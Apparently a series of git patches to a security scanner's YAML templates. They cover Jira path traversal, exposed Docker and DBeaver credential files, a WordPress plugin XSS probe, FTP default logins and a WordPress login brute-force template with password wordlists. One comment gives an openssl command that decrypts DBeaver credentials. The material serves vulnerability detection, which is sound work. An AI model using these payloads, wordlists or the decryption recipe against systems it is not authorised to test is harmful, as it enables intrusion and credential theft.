"{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" + - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - <groupId>com.atlassian.jira</groupId> + - '<groupId>com.atlassian.jira</groupId>' part: body \ No newline at end of file diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index d1f0f8ec5a..3e39b3447e 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -13,12 +13,14 @@ requests: path: - "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" - "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - <groupId>com.atlassian.jira</groupId> + - '<groupId>com.atlassian.jira</groupId>' part: body \ No newline at end of file From 43fe7437297dbd95db474af4e9391b8ee88a88f4 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:07:02 +0530 Subject: [PATCH 1800/4083] Update and rename dockercfg.yaml to dockercfg-config.yaml --- .../tokens/docker/{dockercfg.yaml => dockercfg-config.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposures/tokens/docker/{dockercfg.yaml => dockercfg-config.yaml} (85%) diff --git a/exposures/tokens/docker/dockercfg.yaml b/exposures/tokens/docker/dockercfg-config.yaml similarity index 85% rename from exposures/tokens/docker/dockercfg.yaml rename to exposures/tokens/docker/dockercfg-config.yaml index 19533b6ff0..8bcc53c8c3 100644 --- a/exposures/tokens/docker/dockercfg.yaml +++ b/exposures/tokens/docker/dockercfg-config.yaml @@ -1,11 +1,11 @@ -id: dockercfg +id: dockercfg-config info: name: Detect .dockercfg author: geeknik severity: high description: Docker registry authentication data - tags: docker,exposure + tags: docker,exposure,config requests: - method: GET @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 93894d5b8c84175f960f01f392e012712460dff4 Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:09:33 +0530 Subject: [PATCH 1801/4083] Update dbeaver-credentials.yaml --- exposures/configs/dbeaver-credentials.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml index ecd3bfa1d3..b1405e62be 100644 --- a/exposures/configs/dbeaver-credentials.yaml +++ b/exposures/configs/dbeaver-credentials.yaml @@ -6,15 +6,14 @@ info: severity: info tags: exposure,dbeaver -# to decode the above file, run this: -# openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null - - requests: - method: GET path: - "{{BaseURL}}/.dbeaver/credentials-config.json" + # To decode the credentials file, use following command: + # openssl aes-128-cbc -d -K "babb4a9f774ab853c96c2d653dfe544a" -iv 00000000000000000000000000000000 -in credentials-config.json | dd bs=1 skip=16 2>/dev/null + matchers-condition: and matchers: - type: status From 1def46a72e46a2bc5e2e0b82c2eda714f0a1195a Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:11:10 +0530 Subject: [PATCH 1802/4083] Update firebase-config-exposure.yaml --- exposures/configs/firebase-config-exposure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/firebase-config-exposure.yaml b/exposures/configs/firebase-config-exposure.yaml index 3160a6eb2e..c67be4fe59 100644 --- a/exposures/configs/firebase-config-exposure.yaml +++ b/exposures/configs/firebase-config-exposure.yaml @@ -5,7 +5,7 @@ info: author: geeknik reference: https://github.com/firebase/firebaseui-web/blob/master/demo/public/sample-config.js severity: high - tags: firebase,exposure + tags: firebase,exposure,config requests: - method: GET From 62530eafc26f1aef9c54403cf3324127c3e207d3 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:15:26 +0530 Subject: [PATCH 1803/4083] Update wp-slideshow-xss.yaml --- vulnerabilities/wordpress/wp-slideshow-xss.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 61a03ab44b..435ff72655 100644 --- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -11,9 +11,9 @@ requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' -# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' matchers-condition: and matchers: From e6c99a2c494b932552e1911d7b9cec21551b297e Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:16:57 +0530 Subject: [PATCH 1804/4083] Update hp-ilo-5.yaml --- exposed-panels/hp-ilo-5.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/hp-ilo-5.yaml b/exposed-panels/hp-ilo-5.yaml index e11323e7fb..01141da18d 100644 --- a/exposed-panels/hp-ilo-5.yaml +++ b/exposed-panels/hp-ilo-5.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: info reference: https://www.hpe.com/us/en/servers/integrated-lights-out-ilo.html - tags: hp,ilo + tags: hp,ilo,panel requests: - method: GET From 1a34341c1ebc5db031e31a3c59a25b9b13e9305f Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:20:53 +0530 Subject: [PATCH 1805/4083] Update CVE-2018-6008.yaml --- cves/2018/CVE-2018-6008.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml index e2f44990c0..65848e8da0 100644 --- a/cves/2018/CVE-2018-6008.yaml +++ b/cves/2018/CVE-2018-6008.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Arbitrary File Download exists in the Jtag Members Directory 5.3.7 component for Joomla! via the download_file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/43913 - https://www.cvedetails.com/cve/CVE-2018-6008 tags: cve,cve2018,joomla,lfi From 826f91fd865bbdb198752c51cf2778041cfa707b Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:22:20 +0530 Subject: [PATCH 1806/4083] Update CVE-2010-1314.yaml --- cves/2010/CVE-2010-1314.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1314.yaml b/cves/2010/CVE-2010-1314.yaml index 2fba0d607c..0d487cfbda 100644 --- a/cves/2010/CVE-2010-1314.yaml +++ b/cves/2010/CVE-2010-1314.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12086 - https://www.cvedetails.com/cve/CVE-2010-1314 tags: cve,cve2010,joomla,lfi From f01445b88324bcabb2b98040c2cafc026af1fe82 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 15:36:40 +0530 Subject: [PATCH 1807/4083] minor refactor --- network/ftp-default-credentials.yaml | 20 +++++++++++++++++++ ...t-creds.yaml => ftp-weak-credentials.yaml} | 6 ++---- 2 files changed, 22 insertions(+), 4 deletions(-) create mode 100644 network/ftp-default-credentials.yaml rename network/{ftp-default-creds.yaml => ftp-weak-credentials.yaml} (74%) diff --git a/network/ftp-default-credentials.yaml b/network/ftp-default-credentials.yaml new file mode 100644 index 0000000000..f8ef8e5479 --- /dev/null +++ b/network/ftp-default-credentials.yaml @@ -0,0 +1,20 @@ +id: ftp-default-credentials + +info: + name: FTP Service with default credentials + author: pussycat0x + severity: low + tags: network,ftp,default-login + +network: + + - inputs: + - data: "USER anonymous\r\nPASS anonymous\r\n" + host: + - "{{Hostname}}:21" + - "{{Hostname}}" + + matchers: + - type: word + words: + - "230" \ No newline at end of file diff --git a/network/ftp-default-creds.yaml b/network/ftp-weak-credentials.yaml similarity index 74% rename from network/ftp-default-creds.yaml rename to network/ftp-weak-credentials.yaml index 7b1e8b82c9..d3d5380725 100644 --- a/network/ftp-default-creds.yaml +++ b/network/ftp-weak-credentials.yaml @@ -1,7 +1,7 @@ -id: ftp-default-credentials +id: ftp-weak-credentials info: - name: FTP Service with default credentials + name: FTP Service with weak credentials author: pussycat0x severity: critical tags: network,ftp,default-login @@ -18,9 +18,7 @@ network: username: - admin - root - - anonymous password: - - anonymous - password - toor - nas From cd6ba804cde7464b80ca1c2804d00ecb3c5ae0a8 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 17:20:33 +0530 Subject: [PATCH 1808/4083] Added WordPress Weak Credentials Detection --- fuzzing/wordpress-weak-credentials.yaml | 37 +++++++++++++++++++++++++ helpers/wordlists/wp-passwords.txt | 23 +++++++++++++++ helpers/wordlists/wp-users.txt | 11 ++++++++ 3 files changed, 71 insertions(+) create mode 100644 fuzzing/wordpress-weak-credentials.yaml create mode 100644 helpers/wordlists/wp-passwords.txt create mode 100644 helpers/wordlists/wp-users.txt diff --git a/fuzzing/wordpress-weak-credentials.yaml b/fuzzing/wordpress-weak-credentials.yaml new file mode 100644 index 0000000000..dfcd44edf7 --- /dev/null +++ b/fuzzing/wordpress-weak-credentials.yaml @@ -0,0 +1,37 @@ +id: wordpress-weak-credentials + +info: + name: WordPress Weak Credentials + author: evolutionsec + severity: critical + tags: wordpress,default-login,fuzz + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} + + log={{users}}&pwd={{passwords}} + + payloads: + users: helpers/wordlists/wp-users.txt + passwords: helpers/wordlists/wp-passwords.txt + threads: 50 + attack: clusterbomb + + matchers-condition: and + matchers: + - type: status + status: + - 302 + + - type: word + words: + - '/wp-admin' + - 'wordpress_logged_in' + condition: and + part: header \ No newline at end of file diff --git a/helpers/wordlists/wp-passwords.txt b/helpers/wordlists/wp-passwords.txt new file mode 100644 index 0000000000..035db54faf --- /dev/null +++ b/helpers/wordlists/wp-passwords.txt @@ -0,0 +1,23 @@ +admin +123456 +password +12345678 +666666 +111111 +1234567 +qwerty +siteadmin +administrator +root +123123 +123321 +1234567890 +letmein123 +test123 +demo123 +pass123 +123qwe +qwe123 +654321 +loveyou +adminadmin123 diff --git a/helpers/wordlists/wp-users.txt b/helpers/wordlists/wp-users.txt new file mode 100644 index 0000000000..4167bc387c --- /dev/null +++ b/helpers/wordlists/wp-users.txt @@ -0,0 +1,11 @@ +adm +admin +user +admin1 +hostname +manager +qwerty +root +support +sysadmin +test From 7ca1e38e42ef2d7aad27ac6f404f40503c56ceff Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Mon, 23 Aug 2021 17:22:29 +0530 Subject: [PATCH 1809/4083] misc update --- fuzzing/wordpress-weak-credentials.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/fuzzing/wordpress-weak-credentials.yaml b/fuzzing/wordpress-weak-credentials.yaml index dfcd44edf7..205ea485bc 100644 --- a/fuzzing/wordpress-weak-credentials.yaml +++ b/fuzzing/wordpress-weak-credentials.yaml @@ -8,14 +8,14 @@ info: requests: - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}} - log={{users}}&pwd={{passwords}} + log={{users}}&pwd={{passwords}} payloads: users: helpers/wordlists/wp-users.txt From 7656e0069b28c894afadbd20623ac46c439e3cac Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Mon, 23 Aug 2021 20:54:22 +0700 Subject: [PATCH 1810/4083] Create owasp-juice-shop-detected.yaml --- technologies/owasp-juice-shop-detected.yaml | 25 +++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/owasp-juice-shop-detected.yaml diff --git a/technologies/owasp-juice-shop-detected.yaml b/technologies/owasp-juice-shop-detected.yaml new file mode 100644 index 0000000000..2b7b4a56cc --- /dev/null +++ b/technologies/owasp-juice-shop-detected.yaml @@ -0,0 +1,25 @@ +id: owasp-juice-shop-detect + +info: + name: OWASP Juice Shop + author: pikpikcu + severity: info + tags: tech,owasp + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}:3000" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "<title>OWASP Juice Shop" + + - type: status + status: + - 200 From b5ec33e4c043c34c2c9ad32193d867e4371e6304 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 23 Aug 2021 19:52:39 +0530 Subject: [PATCH 1811/4083] Update dockercfg-config.yaml --- exposures/tokens/docker/dockercfg-config.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/exposures/tokens/docker/dockercfg-config.yaml b/exposures/tokens/docker/dockercfg-config.yaml index 8bcc53c8c3..b3b3106bb5 100644 --- a/exposures/tokens/docker/dockercfg-config.yaml +++ b/exposures/tokens/docker/dockercfg-config.yaml @@ -22,6 +22,11 @@ requests: - '"auth":' condition: and + - type: word + part: header + words: + - "text/plain" + - type: status status: - 200 From 38bc5489870f709cc62c8521aba652a40926e714 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 00:51:51 +0530 Subject: [PATCH 1812/4083] minor update --- technologies/owasp-juice-shop-detected.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/owasp-juice-shop-detected.yaml b/technologies/owasp-juice-shop-detected.yaml index 2b7b4a56cc..1af50bf1ab 100644 --- a/technologies/owasp-juice-shop-detected.yaml +++ b/technologies/owasp-juice-shop-detected.yaml @@ -5,12 +5,12 @@ info: author: pikpikcu severity: info tags: tech,owasp + reference: https://fofa.so/result?qbase64=dGl0bGU9Ik9XQVNQIEp1aWNlIFNob3Ai requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}:3000" matchers-condition: and matchers: From fa5ae7d82d310a15c1c4ec8d31aeda2bccc07394 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 24 Aug 2021 01:31:42 +0530 Subject: [PATCH 1813/4083] Update CVE-2010-1532.yaml --- cves/2010/CVE-2010-1532.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml index 0e8e86595b..594664996b 100644 --- a/cves/2010/CVE-2010-1532.yaml +++ b/cves/2010/CVE-2010-1532.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12118 - https://www.cvedetails.com/cve/CVE-2010-1532 tags: cve,cve2010,joomla,lfi From ae0aabd9051959e5791423af923299d0f4908ad0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 02:50:14 +0530 Subject: [PATCH 1814/4083] misc update --- exposures/configs/dbeaver-credentials.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/configs/dbeaver-credentials.yaml b/exposures/configs/dbeaver-credentials.yaml index b1405e62be..c25710bdcf 100644 --- a/exposures/configs/dbeaver-credentials.yaml +++ b/exposures/configs/dbeaver-credentials.yaml @@ -3,7 +3,7 @@ id: dbeaver-credentials info: name: DBeaver Credential Exposure author: geeknik - severity: info + severity: high tags: exposure,dbeaver requests: From 371d067be242105186e1d72f7f0c4b1a0f99463f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 23 Aug 2021 21:35:07 +0000 Subject: [PATCH 1815/4083] Auto Generated Templates Stats [Mon Aug 23 21:35:07 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1372 +++++++++++++++++++++--------------------- TOP-10.md | 18 +- 3 files changed, 709 insertions(+), 683 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index a77e990153..d448d2c607 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":590},{"name":"panel","count":219},{"name":"xss","count":215},{"name":"wordpress","count":201},{"name":"exposure","count":196},{"name":"rce","count":187},{"name":"lfi","count":176},{"name":"cve2020","count":155},{"name":"wp-plugin","count":136},{"name":"tech","count":101},{"name":"cve2021","count":96},{"name":"config","count":91},{"name":"cve2019","count":87},{"name":"cve2018","count":76},{"name":"takeover","count":73},{"name":"","count":65},{"name":"token","count":64},{"name":"apache","count":64},{"name":"default-login","count":55},{"name":"iot","count":48},{"name":"cve2017","count":47},{"name":"file","count":46},{"name":"oob","count":44},{"name":"unauth","count":42},{"name":"sqli","count":35},{"name":"network","count":35},{"name":"cve2016","count":32},{"name":"ssrf","count":31},{"name":"workflow","count":30},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"redirect","count":25},{"name":"listing","count":24},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"sap","count":18},{"name":"cisco","count":18},{"name":"cve2015","count":18},{"name":"disclosure","count":17},{"name":"springboot","count":15},{"name":"joomla","count":15},{"name":"cve2014","count":15},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"struts","count":13},{"name":"cve2011","count":13},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"auth-bypass","count":13},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"php","count":11},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"fuzz","count":11},{"name":"devops","count":11},{"name":"router","count":11},{"name":"magento","count":9},{"name":"cve2010","count":9},{"name":"ftp","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"xxe","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"cve2009","count":7},{"name":"login","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"nginx","count":7},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"cms","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"coldfusion","count":6},{"name":"dell","count":6},{"name":"solr","count":6},{"name":"java","count":5},{"name":"django","count":5},{"name":"phpmyadmin","count":5},{"name":"ibm","count":5},{"name":"wp-theme","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"netgear","count":5},{"name":"files","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"fileupload","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"confluence","count":5},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"asp","count":4},{"name":"deserialization","count":4},{"name":"webserver","count":4},{"name":"artifactory","count":4},{"name":"jolokia","count":4},{"name":"crlf","count":4},{"name":"thinkphp","count":4},{"name":"zimbra","count":4},{"name":"samsung","count":4},{"name":"tomcat","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"hongdian","count":4},{"name":"docker","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"nodejs","count":4},{"name":"firmware","count":4},{"name":"windows","count":4},{"name":"cve2008","count":4},{"name":"nacos","count":3},{"name":"caucho","count":3},{"name":"git","count":3},{"name":"slack","count":3},{"name":"nosqli","count":3},{"name":"grafana","count":3},{"name":"symfony","count":3},{"name":"itop","count":3},{"name":"zhiyuan","count":3},{"name":"fpd","count":3},{"name":"microstrategy","count":3},{"name":"vbulletin","count":3},{"name":"log","count":3},{"name":"ssh","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"ebs","count":3},{"name":"opensis","count":3},{"name":"bitrix","count":3},{"name":"zabbix","count":3},{"name":"nexus","count":3},{"name":"printer","count":3},{"name":"targa","count":3},{"name":"r-seenet","count":3},{"name":"fanruan","count":3},{"name":"springcloud","count":3},{"name":"mongodb","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"kafka","count":3},{"name":"openssh","count":3},{"name":"resin","count":3},{"name":"microsoft","count":3},{"name":"httpd","count":3},{"name":"wso2","count":3},{"name":"lfr","count":3},{"name":"kevinlab","count":3},{"name":"hp","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"globalprotect","count":2},{"name":"guacamole","count":2},{"name":"telerik","count":2},{"name":"vrealize","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"phpcollab","count":2},{"name":"openam","count":2},{"name":"smb","count":2},{"name":"pega","count":2},{"name":"akamai","count":2},{"name":"mida","count":2},{"name":"activemq","count":2},{"name":"horde","count":2},{"name":"splunk","count":2},{"name":"sonarqube","count":2},{"name":"dolibarr","count":2},{"name":"status","count":2},{"name":"waf","count":2},{"name":"backdoor","count":2},{"name":"voipmonitor","count":2},{"name":"wordfence","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"linkerd","count":2},{"name":"natshell","count":2},{"name":"emerge","count":2},{"name":"jellyfin","count":2},{"name":"chiyu","count":2},{"name":"oauth","count":2},{"name":"avantfax","count":2},{"name":"leak","count":2},{"name":"nagios","count":2},{"name":"service","count":2},{"name":"idrac","count":2},{"name":"webcam","count":2},{"name":"rockethchat","count":2},{"name":"icewarp","count":2},{"name":"ucmdb","count":2},{"name":"nextjs","count":2},{"name":"prometheus","count":2},{"name":"flir","count":2},{"name":"spark","count":2},{"name":"frp","count":2},{"name":"plesk","count":2},{"name":"couchdb","count":2},{"name":"chamilo","count":2},{"name":"showdoc","count":2},{"name":"jboss","count":2},{"name":"intrusive","count":2},{"name":"sonicwall","count":2},{"name":"paloalto","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"azure","count":2},{"name":"grav","count":2},{"name":"huawei","count":2},{"name":"strapi","count":2},{"name":"igs","count":2},{"name":"bigip","count":2},{"name":"proxy","count":2},{"name":"shellshock","count":2},{"name":"saltstack","count":2},{"name":"keycloak","count":2},{"name":"github","count":2},{"name":"openfire","count":2},{"name":"jeedom","count":2},{"name":"sharepoint","count":2},{"name":"dos","count":2},{"name":"kibana","count":2},{"name":"exchange","count":2},{"name":"hjtcloud","count":2},{"name":"jsf","count":2},{"name":"odoo","count":2},{"name":"injection","count":2},{"name":"fortios","count":2},{"name":"akkadian","count":2},{"name":"hpe","count":2},{"name":"xxljob","count":2},{"name":"cve2007","count":2},{"name":"smtp","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"trixbox","count":2},{"name":"cache","count":2},{"name":"hasura","count":2},{"name":"yapi","count":2},{"name":"rockmongo","count":2},{"name":"cve2005","count":2},{"name":"bigbluebutton","count":1},{"name":"glances","count":1},{"name":"gridx","count":1},{"name":"wavlink","count":1},{"name":"plc","count":1},{"name":"uwsgi","count":1},{"name":"xunchi","count":1},{"name":"spf","count":1},{"name":"mirai","count":1},{"name":"exposures","count":1},{"name":"wifisky","count":1},{"name":"qvisdvr","count":1},{"name":"wildfly","count":1},{"name":"keenetic","count":1},{"name":"opm","count":1},{"name":"alibaba","count":1},{"name":"ambari","count":1},{"name":"sidekiq","count":1},{"name":"spectracom","count":1},{"name":"svn","count":1},{"name":"visionhub","count":1},{"name":"zarafa","count":1},{"name":"fortilogger","count":1},{"name":"enumeration","count":1},{"name":"chinaunicom","count":1},{"name":"phpunit","count":1},{"name":"cherokee","count":1},{"name":"getsimple","count":1},{"name":"acexy","count":1},{"name":"parentlink","count":1},{"name":"sar2html","count":1},{"name":"webui","count":1},{"name":"openemr","count":1},{"name":"emby","count":1},{"name":"circontrorl","count":1},{"name":"yealink","count":1},{"name":"opencast","count":1},{"name":"clockwatch","count":1},{"name":"mpsec","count":1},{"name":"cors","count":1},{"name":"oneblog","count":1},{"name":"tensorflow","count":1},{"name":"linkedin","count":1},{"name":"dotnetnuke","count":1},{"name":"mediumish","count":1},{"name":"cloudinary","count":1},{"name":"redcap","count":1},{"name":"cobub","count":1},{"name":"jeewms","count":1},{"name":"sangfor","count":1},{"name":"bookstack","count":1},{"name":"hiboss","count":1},{"name":"mariadb","count":1},{"name":"ilo4","count":1},{"name":"nomad","count":1},{"name":"lancom","count":1},{"name":"cacti","count":1},{"name":"nexusdb","count":1},{"name":"fortiweb","count":1},{"name":"rubedo","count":1},{"name":"tpshop","count":1},{"name":"azkaban","count":1},{"name":"iptime","count":1},{"name":"clink-office","count":1},{"name":"accela","count":1},{"name":"alertmanager","count":1},{"name":"csod","count":1},{"name":"codemeter","count":1},{"name":"gitlist","count":1},{"name":"mcafee","count":1},{"name":"optiLink","count":1},{"name":"tongda","count":1},{"name":"mailchimp","count":1},{"name":"krweb","count":1},{"name":"api-manager","count":1},{"name":"node","count":1},{"name":"aura","count":1},{"name":"netrc","count":1},{"name":"k8s","count":1},{"name":"mongo","count":1},{"name":"sureline","count":1},{"name":"extractor","count":1},{"name":"manageengine","count":1},{"name":"h3c-imc","count":1},{"name":"rhymix","count":1},{"name":"octobercms","count":1},{"name":"redwood","count":1},{"name":"faraday","count":1},{"name":"calendarix","count":1},{"name":"embedthis","count":1},{"name":"mobileiron","count":1},{"name":"tika","count":1},{"name":"centos","count":1},{"name":"aspnuke","count":1},{"name":"openerp","count":1},{"name":"seacms","count":1},{"name":"nc2","count":1},{"name":"perl","count":1},{"name":"floc","count":1},{"name":"clusterengine","count":1},{"name":"salesforce","count":1},{"name":"wazuh","count":1},{"name":"memcached","count":1},{"name":"viewpoint","count":1},{"name":"lighttpd","count":1},{"name":"checkpoint","count":1},{"name":"varnish","count":1},{"name":"razor","count":1},{"name":"linux","count":1},{"name":"expressjs","count":1},{"name":"klog","count":1},{"name":"pgadmin","count":1},{"name":"ricoh","count":1},{"name":"servicedesk","count":1},{"name":"ecom","count":1},{"name":"hortonworks","count":1},{"name":"tapestry","count":1},{"name":"sprintful","count":1},{"name":"fuelcms","count":1},{"name":"ueditor","count":1},{"name":"qdpm","count":1},{"name":"gotmls","count":1},{"name":"sgp","count":1},{"name":"portainer","count":1},{"name":"skywalking","count":1},{"name":"thinkadmin","count":1},{"name":"rmi","count":1},{"name":"weiphp","count":1},{"name":"rdp","count":1},{"name":"sourcebans","count":1},{"name":"wondercms","count":1},{"name":"firebase","count":1},{"name":"rfi","count":1},{"name":"smartsense","count":1},{"name":"magicflow","count":1},{"name":"zenario","count":1},{"name":"xvr","count":1},{"name":"javascript","count":1},{"name":"rabbitmq","count":1},{"name":"lg-nas","count":1},{"name":"db","count":1},{"name":"scimono","count":1},{"name":"avalanche","count":1},{"name":"clave","count":1},{"name":"auth","count":1},{"name":"flash","count":1},{"name":"wing-ftp","count":1},{"name":"rujjie","count":1},{"name":"scs","count":1},{"name":"panos","count":1},{"name":"vnc","count":1},{"name":"moinmoin","count":1},{"name":"lansweeper","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"darkstat","count":1},{"name":"flink","count":1},{"name":"concrete","count":1},{"name":"zte","count":1},{"name":"cofax","